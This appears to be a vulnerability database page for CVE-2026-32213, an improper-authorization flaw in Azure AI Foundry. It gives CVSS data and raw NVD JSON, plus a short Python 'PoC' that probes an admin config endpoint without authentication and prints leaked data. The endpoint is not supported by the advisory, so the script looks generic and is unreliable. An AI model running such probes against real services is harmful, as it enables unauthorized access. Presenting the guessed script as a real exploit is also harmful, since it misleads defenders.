Security Vulnerability Report
中文
CVE-2026-32213 CVSS 10.0 CRITICAL

CVE-2026-32213

Published: 2026-04-03 00:16:05
Last Modified: 2026-04-06 18:17:59

Description

Improper authorization in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:azure_ai_foundry:-:*:*:*:*:*:*:* - VULNERABLE
版本信息未披露

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_privilege_escalation(target_url): """ PoC for CVE-2026-32213 Attempts to access a privileged endpoint without authentication. """ headers = { "User-Agent": "PoC-Scanner/1.0", "Content-Type": "application/json" } # Attempting to access a sensitive resource that should require auth response = requests.get(f"{target_url}/api/admin/config", headers=headers, timeout=10) if response.status_code == 200: print("[!] Vulnerability Exploitable: Authorization Bypass Successful") print(f"[!] Leaked Data: {response.text[:100]}...") else: print(f"[-] Attempt failed with status code: {response.status_code}") if __name__ == "__main__": target = "https://<azure-ai-foundry-instance>" exploit_privilege_escalation(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32213", "sourceIdentifier": "[email protected]", "published": "2026-04-03T00:16:04.877", "lastModified": "2026-04-06T18:17:58.930", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Improper authorization in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:azure_ai_foundry:-:*:*:*:*:*:*:*", "matchCriteriaId": "4A693909-5648-4575-B10E-F06B77153C21"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32213", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}